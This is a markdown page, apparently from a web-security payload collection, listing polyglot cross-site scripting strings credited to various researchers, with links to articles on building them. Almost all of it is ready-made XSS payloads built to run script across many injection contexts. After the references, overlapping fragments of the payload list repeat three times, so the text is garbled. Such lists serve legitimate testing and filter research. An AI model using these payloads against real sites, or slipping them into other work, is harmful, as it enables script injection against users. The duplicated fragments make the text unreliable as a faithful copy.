# Polyglot XSS * Polyglot XSS - 0xsobky ```javascript jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e ``` * Polyglot XSS - Ashar Javed ```javascript ">>" >|\>@gmail.com'-->" >">'"> ``` * Polyglot XSS - Mathias Karlsson ```javascript " onclick=alert(1)// */ alert(1)// ``` * Polyglot XSS - Rsnake ```javascript ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- >">'> ``` * Polyglot XSS - Daniel Miessler ```javascript ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> “ onclick=alert(1)// */ alert(1)// '">>">|\>@gmail.com'-->">">'"> javascript://'/-->*/alert()/* javascript://-->"/*/a javascript://"/*// javascript://-->*/alert()/* javascript://'//" -->*/alert()/* javascript://*/alert()/* -->"/*/alert()/* /*/alert()/* javascript://-->*/alert()/* ``` * Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ```javascript -->'"/> ``` ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ```javascript // Author: europa javascript:"/*'/*`/*\" /*<svg/onload=/* // Author: EdOverflow javascript:"/*\"/*`/*' /*--><svg onload=/* // Author: h1/ragnar javascript:`//"//\"//<svg/onload='/*-->` ``` * Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) ```javascript JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k ``` ## References - [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) - [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
*/alert()/* javascript://-->"/*/a javascript://"/*// javascript://-->*/alert()/* javascript://'//" -->*/alert()/* javascript://*/alert()/* -->"/*/alert()/* /*/alert()/* javascript://-->*/alert()/* ``` * Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ```javascript -->'"/> ``` ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ```javascript // Author: europa javascript:"/*'/*`/*\" /*<svg/onload=/* // Author: EdOverflow javascript:"/*\"/*`/*' /*--><svg onload=/* // Author: h1/ragnar javascript:`//"//\"//<svg/onload='/*-->` ``` * Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) ```javascript JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k ``` ## References - [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) - [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
*/alert()/* javascript://-->*/alert()/* ``` * Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ```javascript -->'"/> ``` ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ```javascript // Author: europa javascript:"/*'/*`/*\" /*<svg/onload=/* // Author: EdOverflow javascript:"/*\"/*`/*' /*--><svg onload=/* // Author: h1/ragnar javascript:`//"//\"//<svg/onload='/*-->` ``` * Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) ```javascript JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k ``` ## References - [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) - [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
*/alert()/* ``` * Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ```javascript -->'"/> ``` ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ```javascript // Author: europa javascript:"/*'/*`/*\" /*<svg/onload=/* // Author: EdOverflow javascript:"/*\"/*`/*' /*--><svg onload=/* // Author: h1/ragnar javascript:`//"//\"//<svg/onload='/*-->` ``` * Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) ```javascript JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k ``` ## References - [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/) - [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)